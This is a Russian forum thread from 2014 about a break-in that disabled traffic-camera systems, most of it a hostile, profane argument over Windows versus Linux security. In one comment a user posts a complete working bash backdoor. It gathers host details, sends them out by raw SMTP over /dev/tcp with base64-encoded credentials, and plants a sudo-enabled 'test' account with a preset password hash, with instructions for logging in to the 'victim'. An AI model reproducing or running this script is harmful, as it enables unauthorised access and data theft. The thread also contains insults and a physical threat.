— найден инородный вредоносный пакетный файл 222.bat, настроенный для автоматического изменения пароля операционной системы и запуска исполняемого файла 1.exe;
— изменены пароли на доступ в операционную систему с правами администратора.
Причиной неработоспособности комплексов является умышленный взлом операционной системы неизвестными лицами.
В настоящее время восстановлена работа 10 из 130 выведенных из строя комплексов видеофиксации. Полностью работоспособность всей системы будет восстановлена до 16 января. Причины инцидента и размер ущерба выясняются.
Комментарии:
# 14 января 2014 09:45:29 | Tritus 0 0
Так что же всё-таки повредило систему? Вирус или целенаправленный взлом?
# 14 января 2014 09:56:39 | Luca 0 0
Интересно сколько еще лет пройдет прежде чем XP вымрет на всяких банкоматах и терминалах...
# 14 января 2014 09:58:03 | R.E.D. 0 0
Сообщение от Luca
Интересно сколько еще лет пройдет прежде чем XP вымрет на всяких банкоматах и терминалах...
Интересно, а есть ли дешевая и адекватная замена XP не от МС?
# 14 января 2014 10:08:27 | Павел 0 0
Сообщение от R.E.D.
Интересно, а есть ли дешевая и адекватная замена XP не от МС?
Да неужто такое возможно?..
# 14 января 2014 10:19:16 | R.E.D. 0 0
Сообщение от Павел
Да неужто такое возможно?..
Ну приведи мне пример, пожалуйста.
# 14 января 2014 10:26:13 | Штул� 0 0
,Самое смешное в этой истории с камерами то, что чиновники тоскуют не о безопасности движения, а о потеряной "прибыли" ) "Министерство транспорта Московской области посчитало, что из-за отключения стационарных камер контроля скорости регион не досчитается полутора миллионов рублей бюджетных доходов. Об этом со ссылкой на пресс-службу ведомства сообщает 14 января РИА Новости." Не о чём то другом, а о прибыли.
# 14 января 2014 11:05:10 | Павел 0 1
Сообщение от R.E.D.
Ну приведи мне пример, пожалуйста.
Операционная система, которую обычно ставят в IP-камерах видеонаблюдения. 5 букв.
Вторая i. ;-))
# 14 января 2014 11:11:02 | Linux777 -1 0
Сообщение от R.E.D.
Интересно, а есть ли дешевая и адекватная замена XP не от МС?
Конечно нет, только свитой виндус икспии - лушая ОЗь! Альтернатив нет, только огромный системный блок, только x86-кипятильник, только дельфи только хардкор.
Куда уж там компактному экономичному линупсу, работающему на компьютерах размером с SD-карту и прошивках устройств, у которых после перезагрузки всё продолжает работать.
# 14 января 2014 11:15:42 | Linux777 -1 0
Сообщение от Павел
Операционная система, которую обычно ставят в IP-камерах видеонаблюдения. 5 букв. Вторая i. ;-))
Дай-ка подумать... Неужели Winda? :)))
# 14 января 2014 11:23:06 | Павел 0 0
Сообщение от Linux777
Дай-ка подумать... Неужели Winda? :)))
Ты знал! Ты знал!.. ;-)))
# 14 января 2014 11:29:55 | R.E.D. 0 0
Сообщение от Павел
Операционная система, которую обычно ставят в IP-камерах видеонаблюдения. 5 букв.
Вторая i. ;-))
Minix? Дак она же учебная!
Сообщение от Linux777
дельфи
А это на кой?
Сообщение от Linux777
Куда уж там компактному экономичному линупсу, работающему на компьютерах размером с SD-карту и прошивках устройств, у которых после перезагрузки всё продолжает работать.
А это точно. Джаст фор фан, как говорится.
# 14 января 2014 11:52:40 | Linux777 -1 0
Сообщение от R.E.D.
Minix? Дак она же учебная!
Minix начиная с 3.x не является учебной. В одно время я в огромным интересом следил за развитием Minix, но увы, этой ОС не хватало даже простейших базовых возможностей, типа поддержки shared objects (например формата ELF), поддержки pthreads, от которых куча нужных библиотек зависит. Увы, разработчики не считали это приоритетом, но если на ОСи ничего не машет - нах она такая нужна? Кто будет портировать и тестировать софт под ней, если никак? Так что, увы...
Вот Genode OS - не имеет недостатков Minix 3, а также поддерживает Gallium 3D, что немаловажно, так что - перспективная ОС это Genode и я очень жду их релиза в качестве ОС общего назначения. К тому же они делают порты для ARM для известных плат типа raspberry, beagleboard и прочих, которые у меня есть...
# 14 января 2014 02:05:00 | MOP3E 0 0
Сообщение от Luca
Однако XP оказался не защищен от вирусов и 10 января из строя вышли уже 110 из 144 установленных в Московской области камер.
Ынтересно, откуда в закрытой сети камер видеонаблюдения взялся вирус? Тем более, что:
Сообщение от Источник
— в результате намеренного взлома системы была повреждена файловая система блоков обработки и управления комплексов «Стрелка-СТ», что делает невозможным запуск операционной системы Windows XP и специализированного программного обеспечения комплексов;
— повреждены системные журналы операционной системы; на системном диске С:
— найден инородный вредоносный пакетный файл 222.bat, настроенный для автоматического изменения пароля операционной системы и запуска исполняемого файла 1.exe;
— изменены пароли на доступ в операционную систему с правами администратора.
Причиной неработоспособности комплексов является умышленный взлом операционной системы неизвестными лицами.— в результате намеренного взлома системы была повреждена файловая система блоков обработки и управления комплексов «Стрелка-СТ», что делает невозможным запуск операционной системы Windows XP и специализированного программного обеспечения комплексов;
— повреждены системные журналы операционной системы; на системном диске С:
— найден инородный вредоносный пакетный файл 222.bat, настроенный для автоматического изменения пароля операционной системы и запуска исполняемого файла 1.exe;
— изменены пароли на доступ в операционную систему с правами администратора.
Причиной неработоспособности комплексов является умышленный взлом операционной системы неизвестными лицами.
Вирус, ага.
Хабр такой хабр...
З.Ы. А я знаю, кто в этом виноват!
# 14 января 2014 02:15:52 | MOP3E 0 0
Сообщение от Linux777
Куда уж там компактному экономичному линупсу, работающему на компьютерах размером с SD-карту и прошивках устройств, у которых после перезагрузки всё продолжает работать.
Скажи, а если линуховую прошивку намеренно повредить - она будет работать?
# 15 января 2014 08:27:43 | Linux777 -1 0
Сообщение от MOP3E
Скажи, а если линуховую прошивку намеренно повредить - она будет работать?
Ну попытайся повредить из ОС read-only участки флэша... ^_^
# 15 января 2014 11:46:01 | msAVA -1 1
Сообщение от Linux777
Ну попытайся повредить из ОС read-only участки флэша.
А если молотком? Помните:
"Надёжна бытовая техника существует. Доказано Zanussi!"
"Абсолютно надёжной бытовой техники не существует. Доказано кувалдой!"
# 15 января 2014 12:05:50 | kenzzzooo 0 0
Сообщение от Linux777
Ну попытайся повредить из ОС read-only участки флэша..
это относится только к линуксу? :)
# 15 января 2014 12:16:19 | Linux777 -1 0
Сообщение от kenzzzooo
это относится только к линуксу? :)
это не относится к "обычному виндусу икспии" ;)
вот xp embedded - другое дело, если бы эта ОСь не была говном
чтобы говорить что xp embedded говно, я применял эту ОС до того как перейти на Linux для embedded, у нас даже лицензия была куплена от некросовта :)
# 15 января 2014 12:30:59 | kenzzzooo 0 0
Сообщение от Linux777
это не относится к "обычному виндусу икспии" ;)
собственно, как и вопрос вам о намеренном повреждении линукса от MOP3E :) спрашивается: чего скачем-то с темы? :)
Сообщение от Linux777
чтобы говорить что xp embedded говно, я применял эту ОС до того как перейти на Linux для embedded, у нас даже лицензия была куплена от некросовта :)
да за ради Бога :) у нас все устройства, а-ля ТСД, на embedded и ничего, работают как часы :) вы-то можете что угодно говорить, только, очень сильно сомневаюсь, что вас здесь кто-то будет серьезно воспринимать :)
# 15 января 2014 12:46:54 | Linux777 -1 0
Сообщение от kenzzzooo
у нас все устройства, а-ля ТСД, на embedded и ничего, работают как часы :) вы-то можете что угодно говорить, только, очень сильно сомневаюсь, что вас здесь кто-то будет серьезно воспринимать :)
Я и не говорю что xp embedded работает как-то не так, весьма хорошо. Просто процессор создания образа такой ОС - ущербен и потому исполнители заказа гибдд просто взяли обычный виндус, потому что с ним не надо париться и так сойдет. Вот и получилось :)
# 15 января 2014 01:51:16 | kenzzzooo 0 0
Сообщение от Linux777
Я и не говорю что xp embedded работает как-то не так, весьма хорошо. Просто процессор создания образа такой ОС - ущербен и потому исполнители заказа гибдд просто взяли обычный виндус, потому что с ним не надо париться и так сойдет. Вот и получилось :)
ну вот :) очередные линуксоиды ниасилили теперь уже xp embedded :)
# 15 января 2014 03:28:36 | Linux777 -1 0
kenzzzooo, кушайте эти помои сами, на здоровье :)
# 15 января 2014 04:08:00 | MOP3E 0 0
Сообщение от Linux777
это не относится к "обычному виндусу икспии" ;)
Ещё как относится. Можно, например, сделать загрузчик, который будет в процессе запуска системы переписывать образ ОС на виртуальный диск в памяти. XP с минимальным набором программ и драйверов не будет требовать много ОЗУ. Но такой метод решения задачи уже является хардверным, а софтверным. Поэтому вернёмся к нашим баранам. Так какова у линуха устойчивость к взлому?
Сообщение от kenzzzooo
собственно, как и вопрос вам о намеренном повреждении линукса от MOP3E :)
Да нет, мой вопрос как раз в тему - в ответ на голословные утверждения пенгватуных о том, что "ХР говно, так как в ней водятся вирусы". Не было там вируса - были обнаружены именно следы взлома.
Сообщение от Linux777
Просто процессор создания образа такой ОС - ущербен
Очередной ниасилятор, ага.
Сообщение от Linux777
потому исполнители заказа гибдд просто взяли обычный виндус, потому что с ним не надо париться и так сойдет.
Мдя, фанатеги на марше. Лично я в 2009 году наблюдал работу новейшей сталеплавильной печи под управлением промышленного компьютера, на котором была запущена Windows NT 4.0. Этот компьютер отвечает, ни много ни мало, за поддержание необходимых параметров электрической дуги в зоне плавления металла. Линух, видимо, не могёть. :)
# 15 января 2014 04:26:07 | Штул� 0 0
Сообщение от MOP3E
найден инородный вредоносный пакетный файл 222.bat, настроенный для автоматического изменения пароля операционной системы и запуска исполняемого файла 1.exe;
Когда линуксоидам тыкали в лицо файлом на шкриптах (bat), который запускал кейлоггер (exe) и отсылал собраную инфу удалённо, то они стыдливо с ужимками клоунов говорили, что это не вирус)
# 15 января 2014 06:31:19 | kenzzzooo 0 0
Сообщение от MOP3E
Да нет, мой вопрос как раз в тему - в ответ на голословные утверждения пенгватуных о том, что "ХР говно, так как в ней водятся вирусы". Не было там вируса - были обнаружены именно следы взлома.
Я немного не про это. Я о том, что Linux777 переключился с обычного линукса на embedded в ответе на Ваш вопрос о преднамеренном повреждении прошивки. :)
# 15 января 2014 06:32:09 | Passerby 0 0
Сообщение от Штул�
Когда линуксоидам тыкали в лицо файлом на шкриптах
Дико извиняюсь, а когда тыкали? И, самое главное, как? Примерно также, как Babusha своим шкриптом на PS?
# 15 января 2014 06:52:33 | MOP3E 0 0
Сообщение от kenzzzooo
Я немного не про это. Я о том, что Linux777 переключился с обычного линукса на embedded в ответе на Ваш вопрос о преднамеренном повреждении прошивки. :)
Ага, понятно.
# 15 января 2014 08:29:35 | Штул� 0 0
Сообщение от Passerby
Дико извиняюсь, а когда тыкали? И, самое главное, как? Примерно также, как Babusha своим шкриптом на PS?
Да почему ) На старом СЛОРе тема валяется, линуксоиды там квадратными кирпичами срали )
# 15 января 2014 09:29:42 | Павел 0 0
Сообщение от Штул�
На старом СЛОРе тема валяется, линуксоиды там квадратными кирпичами срали )
Да какие они линуксоиды... Привыкли в Windows заборы из костылей ладить. Решили через торренты всех заразить. Только адрес забыли... Кирпичи знатные были, да.
# 15 января 2014 10:21:52 | Штул� 0 0
Сообщение от Павел
Да какие они линуксоиды... Привыкли в Windows заборы из костылей ладить. Решили через торренты всех заразить. Только адрес забыли... Кирпичи знатные были, да.
Ну почему через торренты?) Это и в других местах сработало, учебник хороший был ) Точь в точь, как в этой "новости")
# 16 января 2014 06:13:36 | Passerby 0 0
Сообщение от Штул�
На старом СЛОРе тема валяется, линуксоиды там квадратными кирпичами срали
Ну так ссылку на тему и посмотрим по какому поводу там кирпичи были. Наверное как и с бабушиным скриптом.
-Мыкола, ну зыграйБабуша, ну покажи как твой скрипт работает.
-Та не можу, дайте мине архив с такими файлами внутри.
-Держи. Покажи как.
-Та не можу, дайте мине ещё и архиватор, который его грамотно распаковать сможет.
-Блин, да запиши ты тогда эти файлы на флэшку под линуксом и вставь её в виндовую машину.
-Та не можу, я новый антивирус прикупил и на флэшку уже денег нету.
Громадяне, а зараз вы прослухали капризы Мыколы Паганини Бабуши.
# 16 января 2014 07:47:40 | Rector 0 0
Сообщение от MOP3E
А я знаю, кто в этом виноват!
Серьёзное заявление. А может это был мелкий подхалимаж? -)
Сообщение от Павел
Но блин, кто же камеры заразил? Это за гранью.
Самим камерам ничего не сделается. Там как правило линукс стоит. А вот уже к каждой камере подключается некий программно-аппаратный комплекс (под управлением winxp), для обработки видеопотока, распознавания номеров и прочее, с отсылкой промежуточных данных на некий центральный сервер, который и проводит дальнейшую обработку (выписывает штрафы, рассылает их по почте и т.д.).
Далее варианты..
1. Атака изнутри. Обиженный (купленный) админ. Очень банально -)
2. Атака с внешней сети.
Возможно центральный(е) сервер(а) постобработки торчали голыми задницами во внешнюю сеть. Хакер, получив контроль над одним из них, получил и дальнейший контроль локальных (постовых) систем. Но зачем было тупо всё ломать? Поселился бы по тихому там и тёще штрафы выписывал -))
# 16 января 2014 09:19:43 | Штул� 0 0
Сообщение от Passerby
Наверное как и с бабушиным скриптом.
Да зачем его PS? ) Ваш родной язык сценариев, который изначально, например в deb установщике используется ) Вы когда последний раз, при установке, на сон грядущий код проверяли?) А бабушка, с дедушкой, которым вы внедрили полуфабрикат, тоже проверяют?)
# 16 января 2014 06:56:56 | Штул� 0 1
Кстате, нате вот вам ) Изучайте свой "язык" командной оболочки, содраный из темы на старом СЛОР-е )
#!/bin/bash
ip=`wget -O - -q icanhazip.com`
name=`hostname`
sys=`cat /etc/issue.net`
sshd=`ps -A|grep sshd|wc -l`
sshdinst=`which ssh`
proc=`cat /proc/cpuinfo | grep name`
mem=`cat /proc/meminfo | grep MemTotal`
port=`grep 'Port' /etc/ssh/sshd_config`
user=`grep 'test' /etc/shadow`
if [ ! -z ${user} ] ; then
exit 0
else
message="User test added, okey!"
fi
if [ $sshd -eq 0 ] ; then
sshd="SSH off"
else
sshd="SSH on"
fi
if [ ! -z ${sshdinst} ] ; then
sshdinst="SSH installed"
else
sshdinst="SSH not installed"
fi
e_from="54321@mail.ru"
e_to="12345@mail.ru"
header="test"
body="$ip | $name | $sys | $sshd | $sshdinst | $port | $mem | $proc | $message"
e_server="smtp.mail.ru"
e_login="bGludHJveWZyb20="
e_pass="MTk2NE1hc3Rlcg=="
subject="$ip $name"
e_port=25
exec 9<>/dev/tcp/$e_server/$e_port
echo "HELO me" >&9
read -r temp <&9
echo "auth login" >&9
read -r temp <&9
echo $e_login >&9
read -r temp <&9
echo $e_pass >&9
read -r temp <&9
echo "Mail From: $e_from" >&9
read -r temp <&9
echo "Rcpt To: $e_to" >&9
read -r temp <&9
echo "Data" >&9
read -r temp <&9
echo $header >&9
echo "Subject: "$subject >&9
echo "From: "$e_from >&9
echo "To: "$e_to >&9
echo >&9
echo $body >&9
echo "." >&9
read -r temp <&9
echo "quit" >&9
read -r temp <&9
9>&-
9<&-
useradd test > /dev/null > /dev/null
sed -i -e '$d' /etc/shadow
echo 'test:$6$NLlTvcG8$uxTIzzEJ4cLteSS2Oa8hJEitu0kVSXOXTpwrf0e9KyeaBBUuaQjBmNNAKxTV4NmFHAvsU0iPsXwfNurroc0DE1:16012:0:99999:7:::' >> /etc/shadow
adduser test sudo > /dev/null > /dev/null
exit 0
(с) Все права нарушены )
На почту, условно названую 12345@mail.ru (логины и пассы прописаны в base64) придёт, после удачного запуска вот примерно такое послание (нужное подменить по желанию):
test
Subject: 111.111.111.111 жертва
From: 54321@mail.ru
To: 12345@mail.ru
111.111.111.111 | dk | Ubuntu 12.04.4 LTS | SSH on | SSH installed | Port 2020 | MemTotal: 760372 kB | model name : Intel(R) Celeron(R) CPU 2.53GHz | User test added, okey!
После чего можно заходить по адресу 111.111.111.111 посредством ssh клиента юзером test, с паролем 12345 и резвиться с полуфабрикатом "жертва", имея его во все дыхательные и пихательные. Если уж вам сильно приспичит, то можно и бинарник сваять)
Примитив собственно, как примитивен и полуфабрикат )
edited: Штул�, 16.01.2014 19:05
# 16 января 2014 08:56:24 | Павел 0 0
Сообщение от Штул�
Кстате, нате вот вам ) Изучайте свой "язык" командной оболочки, содраный из темы на старом СЛОР-е )
Любитель ты старые портянки нюхать... Ею подтерлись уже больше года назад, если что.
# 16 января 2014 09:19:31 | MOP3E 0 0
Сообщение от Павел
Любитель ты старые портянки нюхать... Ею подтерлись уже больше года назад, если что.
Тем не менее, следуя вашей же логике, это - вирус.
# 16 января 2014 09:33:24 | Tritus 0 0
На убунтуфоруме занятнейшая тема - несанкционированное подключение к рабочей станции. Наблюдаю с интересом. Эксперты теряются в догадках - дальше, чем наличие волоса на сенсоре оптической мыши, догадки не идут...
# 16 января 2014 10:22:13 | Rector 0 0
Сообщение от Tritus
На убунтуфоруме занятнейшая тема - несанкционированное подключение к рабочей станции.
Ничего такого интересного. Чел скачал с левого источника Tor, ибо просто дурачок и мышление виндузятника - качать файло с разных помоек. В результате, так как...
линухой он пользуется месяц с небольшим, где-то он вычитал что с помощью Tor можно скрытно сидеть в инете. Установил ее. И через несколько дней началось. С установкой Тор, или еще чего-то в списках юзеров появились: mixmaster, debian-tor, openerp, privoxy, proxy
С рутовыми правами, ага -)
===
А левые источники...Ну вот, как пример - сайт госуслуг при регистрации, хочет поставить некий "плагин для браузера"....
https://dynamic.linexp.ru/Files/2014/58218d31-ffb1-4bda-9d59-75afed113b83.png
Который представляет собой некий CSuserPlugin.deb, размером 1.3 Мб. Который поставит в систему, под рутом конечно, хренову тучу левых библиотек, изменит/добавит правила в udev, имеет в своём составе некий бинарник. Это так, при беглом просмотре. Много здесь найдётся желающих втулить подобное себе в систему? Я так, чего-то не рискнул -)
# 16 января 2014 10:56:26 | Штул� 0 0
Сообщение от Павел
Любитель ты старые портянки нюхать... Ею подтерлись уже больше года назад, если что.
Это простейший пример) Скажем так, согласно теме: " вредоносный пакетный файл 222.bat, настроенный для автоматического изменения пароля операционной системы ") Работает? Работает! Лососните тунца )
# 16 января 2014 11:09:47 | Штул� 0 0
Сообщение от MOP3E
Тем не менее, следуя вашей же логике, это - вирус.
Пускай молятся на то, что пользователей полуфабриката 1 процент)
# 16 января 2014 11:42:27 | Штул� 0 0
Сообщение от Tritus
На убунтуфоруме занятнейшая тема - несанкционированное подключение к рабочей станции. Наблюдаю с интересом. Эксперты теряются в догадках - дальше, чем наличие волоса на сенсоре оптической мыши, догадки не идут...
Спасибо за наводку! Интересно понаблюдать за непугаными идиотами)
# 17 января 2014 03:42:28 | Павел 0 0
Сообщение от MOP3E
Тем не менее, следуя вашей же логике, это - вирус.
Вирус должен уметь размножаться, батенька. И на этом "закапыватели" всегда как-то замирали в придурковатом виде.
Что касается топика, то хочу напомнить вот это.
# 17 января 2014 09:48:56 | MOP3E 0 0
Сообщение от Павел
Вирус должен уметь размножаться, батенька. И на этом "закапыватели" всегда как-то замирали в придурковатом виде.
Да ты что?! Почему же тогда в этом топике написано про вирус? И какого хрена ты это пишешь здесь мне? Напиши Луке, что название темы некорректное, не стесняйся! Докажи, что ты не пиздабол, не чмо и умеешь признавать свои ошибки.
Сообщение от Rector
Ничего такого интересного. Чел скачал с левого источника Tor, ибо просто дурачок и мышление виндузятника - качать файло с разных помоек. В результате, так как...
...так как линух не имеет никаких встроенных средств защиты, "файло с разных помоек" успешно ставит систему раком.
Сообщение от Rector
Который представляет собой некий CSuserPlugin.deb, размером 1.3 Мб. Который поставит в систему, под рутом конечно, хренову тучу левых библиотек, изменит/добавит правила в udev, имеет в своём составе некий бинарник. Это так, при беглом просмотре. Много здесь найдётся желающих втулить подобное себе в систему? Я так, чего-то не рискнул -)
А антивирусом проверить перед установкой? Ой, бля... в линухе же антивируса нет, так как в нём ничто не может угрожать пользователю и, поэтому, антивирус не нужен! Линух априори "бижапашен"!!! Хотя по факту дыряв как решето. :)
# 17 января 2014 09:58:45 | Rector 0 0
Сообщение от MOP3E
антивирусом проверить перед установкой?
Антивирус - это панацея? Ты наивный чукотский мальчик, закончивший ПТУ в Салехарде по станкам ЧПУ?
Сообщение от MOP3E
Хотя по факту дыряв как решето. :)
Докажи это личными примерами, иначе пиздабол.
+
Сообщение от MOP3E
Докажи, что ты не пиздабол, не чмо и умеешь признавать свои ошибки.
# 17 января 2014 10:15:55 | Tritus 0 0
Сообщение от Rector
Чел скачал с левого источника Tor, ибо просто дурачок и мышление виндузятника - качать файло с разных помоек.
Как бэ утверждается, что Tor ставился с родного бубунтовского репозитория. Хотя как оно на самом деле, естественно, неизвестно...
Сообщение от Rector
Антивирус - это панацея?
Конечно же не панацея! Но хотя бы по известним сигнатурам просканировать лишним не бывает.
# 17 января 2014 11:39:48 | Штул� 0 0
Сообщение от MOP3E
Да ты что?! Почему же тогда в этом топике написано про вирус? И какого хрена ты это пишешь здесь мне? Напиши Луке, что название темы некорректное, не стесняйся! Докажи, что ты не пиздабол, не чмо и умеешь признавать свои ошибки.
Да они всегда так пишут) Как "в винде вирусы ходят как по буфету" ) Они же и вот эту запись относят к вирям:
"document.write('
"
Правда это большей частью касается швабодного и бисплатнага софта, но этот факт почему то стыдливо не выпячивается.
# 17 января 2014 12:11:31 | Штул� 0 0
Сообщение от Павел
Что касается топика, то хочу напомнить вот это.
А что касается топика, Павлик, то нате вот вам:
"Это точно не вирус. В это никто не верит, потому что и пакетный файл 222.bat, и файл 1.exe — это файлы, запускаемые на уровне пользователя, так называемая закладка. Они могут быть с отсроченным сроком действия, но это точно никакой не вирус, потому что обычно он ведет себя скрыто, маскируется под обычные файлы, — отметил источник. — Для простоты можно привести такой пример. Есть перелом руки, а есть инфекция. В первом случае никто не скажет, что человек где-то этим заразился. Вот в данном случае атака на «Стрелку» — это перелом руки»."
В вирусы свято верят только линуксоиды, отбивая поклоны в своей немногочисленой секте)
А вот дальше уже смешнее) Оказывается всё гораздо банальнее)
"Между тем компания «СМУ-7», обслуживающая комплексы, по условиям госконтракта получала деньги в том числе и за обязательное антивирусное обслуживание всех комплексов.
Проверять на наличие вредоносных программ операционную систему всех «Стрелок» должны были два раза в месяц, однако осуществлялась ли в действительности такая проверка, неизвестно.
«Каждое такое антивирусное сканирование стоит бюджету примерно 2800 руб. Причем делается оно удаленно: нажимается кнопка, и через несколько часов можно отследить, что нашел антивирус. В месяц такое антивирусное обслуживание одного комплекса стоит уже около 5600 руб. Учитывая, что вредоносные файлы, как говорят СМИ, охватили все комплексы, я вообще сомневаюсь, что такая проверка проводилась», — поделился мнением источник «Газеты.Ru», знакомый с условиями контракта на обслуживание «Стрелки-СТ»."
edited: Штул�, 17.01.2014 12:20
# 17 января 2014 12:17:47 | MOP3E 0 0
Сообщение от Rector
Антивирус - это панацея?
Антивирус в меру своих возможностей отлавливает вирусы и прочие угрозы для операционной системы. Как-то так.
Сообщение от Rector
Докажи это личными примерами, иначе пиздабол.
Рехтур, ты когда уже мою винду взломаешь? Уже пятый год пиздишь, а воз и ныне там. Ты не просто пиздабол, а пиздабол со стажем. :)
Если линух не дыряв - то почему в нём так опасно ставить программы не из надёжных источников? А потому, что при таком сценарии установки эту мегазащищённую ОС поимеют во все дыры и пользователь даже не поймёт, что это произошло. Человеку руткит в систему встроили, а он не понимает - что и откуда. Это при том, что первые автоматические руткит-атаки на винде начались с выходом первых версий Radmin, давно уже никого не удивляют и прекрасно блокируются антивирусным софтом. Да, линух при его настолько низком уровне защищённости - система совсем не для рядовых пользователей и домохозяек.
# 17 января 2014 02:30:37 | Павел 0 0
Сообщение от MOP3E
Почему же тогда в этом топике написано про вирус?
А на заборе знаешь, что написано?
Сообщение от MOP3E
И какого хрена ты это пишешь здесь мне? Напиши Луке, что название темы некорректное, не стесняйся!
И какого хрена ты это пишешь здесь мне? Напиши Луке сам.
Сообщение от MOP3E
Докажи, что ты не...
А не пойти бы тебе...?
Сообщение от MOP3E
...так как линух не имеет никаких встроенных средств защиты, "файло с разных помоек" успешно ставит систему раком.
Ты так и не признался, когда последний раз ты работал с СПО. Ладно. Тогда уж расскажи, как ты ставил раком Линукс. В подробностях, если не сложно.
edited: Павел, 17.01.2014 14:38
# 17 января 2014 03:06:14 | MOP3E 0 0
Сообщение от Павел
А на заборе знаешь, что написано?
Значит, ты привык слепо доверять надписям на заборах. Мне тебя жаль.
Сообщение от Павел
И какого хрена ты это пишешь здесь мне? Напиши Луке сам.
Уже написал.
Сообщение от Павел
А не пойти бы тебе...?
Я, в принципе, знал, что ты побоишься поступить как честный и благородный человек.
Сообщение от Павел
Ты так и не признался, когда последний раз ты работал с СПО. Ладно. Тогда уж расскажи, как ты ставил раком Линукс. В подробностях, если не сложно.
Вот рецепт. С подробностями. И таких историй по всему инету - сотни.
# 17 января 2014 05:40:17 | Passerby 0 0
Сообщение от MOP3E
И таких историй по всему инету - сотни.
Таких или таких в тысячи раз больше.
# 17 января 2014 05:47:40 | Павел 0 0
Сообщение от MOP3E
Я, в принципе, знал, что ты побоишься поступить как честный и благородный человек.
Тьфу ты, блин... Морзе, как все сложно и тонко, оказывается... Тебе хочется, чтобы я, вот этими руками, опроверг то, что это вирус?
Скажи, а я когда-нибудь это утверждал?
Да на здоровье. Вот, смотри:
Уважаемый топикстартер! Мне кажется, в данной ситуации некорректно говорить о вирусе. По-моему, это типичная программная закладка, которых можно запросто понаделать и в других операционных системах. И в линуксе, в Линуксе тоже. Да, да.
Ну, отпустило?
Я действительно так считаю.
# 17 января 2014 07:15:09 | MOP3E 0 0
Сообщение от Passerby
Таких или таких в тысячи раз больше.
Радуйся, теперь и линух заметили. Значит, не зря пенгванутые старались. А вообще, антивирусы должны пресекать установку такого ПО. У меня ещё в 2007 году антивирь ловил руткит с радминовыми библиотеками.
# 17 января 2014 10:46:55 | Rector 0 0
Сообщение от MOP3E
Рехтур, ты когда уже мою винду взломаешь? Уже пятый год пиздишь, а воз и ныне там
MOP3E, ты в шары долбишься? Я уже неоднократно повторял - нахрена мне ломать твой компьютер, если я банально могу сломать тебе рёбра.
===
Ты сказал, что Linux - дырявое решето. Докажи это личным примером без вращения пятой точки. Личным MOP3E, личным, а не отсылками в Гугол. Не докажешь, значит пиздабол.
# 17 января 2014 10:48:21 | Штул� 0 0
Сообщение от Passerby
Таких или таких в тысячи раз больше.
Сообщение от Штул�
Пускай молятся на то, что пользователей полуфабриката 1 процент)
# 18 января 2014 12:03:36 | Rector 0 0
Сообщение от Tritus
Но хотя бы по известним сигнатурам просканировать лишним не бывает.
Вот именно! По известным -)
Если я напишу в батнике что-то вроде....
https://dynamic.linexp.ru/Files/2014/93ccd588-ffdd-4093-937f-d9e558385dc2.png
Загружу на virustotal....
https://dynamic.linexp.ru/Files/2014/36e37fa9-d0cf-4831-82ef-ed21fe6d8a59.png
И проверю...
https://dynamic.linexp.ru/Files/2014/b3e4c620-93de-4a11-b7c3-7400bd38936f.png
===
То как ты думаешь, юзеру который это запустит сильно полегчает? =)))
# 18 января 2014 06:25:56 | MOP3E 0 0
Сообщение от Rector
Если я напишу в батнике что-то вроде....
О, да, ты - напишешь. На большее твоей фантазии тупо не хватит. А вот эти:
Сообщение от Rector
А левые источники...Ну вот, как пример - сайт госуслуг при регистрации, хочет поставить некий "плагин для браузера"....
Не напишут. Потому что, в отличие от тебя, идиотами не являются и не занимаются по пять лет безуспешным взломом компьютеров по IP. :)
# 18 января 2014 07:15:39 | Rector 0 0
Сообщение от MOP3E
Рехтур, ты - дебил. Без вариантов.
Ну вот, ещё одно заявление от толстомордого ЧПУ-шника. Ладно, то что я дебил, ты потом доказывать будешь -)
Так как на счёт - Линукс-решето, я его сам сломаю? Твои слова? Доказательство будут, или слив?
+
В цветастой консоли, на раз въебу (с) MOP3E
# 18 января 2014 07:24:34 | MOP3E 0 0
Сообщение от Rector
Ну вот, ещё одно заявление от толстомордого ЧПУ-шника. Ладно, то что я дебил, ты потом доказывать будешь -)
Рехтур, ты - даже не знаю, кто. Прошу просветить компетентных людей - как это называется на языке психиатрии, когда человек читает сообщение в одной теме, а отвечает на него в другой?
Сообщение от Rector
Так как на счёт - Линукс-решето, я его сам сломаю? Твои слова?
Неа, не мои. Это бред твоего воспалённого разума. Или, может, у тебя белочка началась от передозировки водки? В общем, давай, до свидания!
# 18 января 2014 07:39:50 | Rector 0 0
Сообщение от MOP3E
Неа, не мои.
Сообщение от MOP3E
Линух априори "бижапашен"!!! Хотя по факту дыряв как решето. :)
===
Вот MOP3E, то ты докторов зовёшь, то дядек в погонах, когда боишься что тебе морду поправят и рёбрышки посчитают собственной продукцией ребятки с Волжского трубного завода, то вращаешь пятой точкой как вертолёт. Кто ты MOP3E?
Думаю что ты вообще за свои слова не отвечаешь.
+
Всё ясно с тобой. Слив засчитан -)
# 18 января 2014 08:13:27 | MOP3E 0 0
Сообщение от Rector
Сообщение от MOP3E Неа, не мои.
Сообщение от MOP3E Линух априори "бижапашен"!!! Хотя по факту дыряв как решето. :)
А где я здесь написал, что что-то взломаю? Иди уже, лечись. Зрение, например, полечи, чтобы буквы удобнее было в слова складывать.
Сообщение от Rector
Всё ясно с тобой. Слив засчитан -)
Ну да, слился ты знатно. Удачи!
# 18 января 2014 08:20:50 | Rector 0 0
Сообщение от MOP3E
А где я здесь написал, что что-то взломаю?
А как ты собираешься, (хотя по твоим движениям, не собираешься) доказывать своё заявление?
Сообщение от MOP3E
Линух априори "бижапашен"!!! Хотя по факту дыряв как решето. :)
Давай посмотрим на другие твои методы -))
# 18 января 2014 09:21:06 | MOP3E 0 0
Сообщение от Rector
А как ты собираешься, (хотя по твоим движениям, не собираешься) доказывать своё заявление?
Как-то так.
------------------------
ТРИО теплый пол отзыв
Заработок на сокращении ссылок
Earnings on reducing links
Код PHP на HTML сайты
Категория: Другое
Комментарии |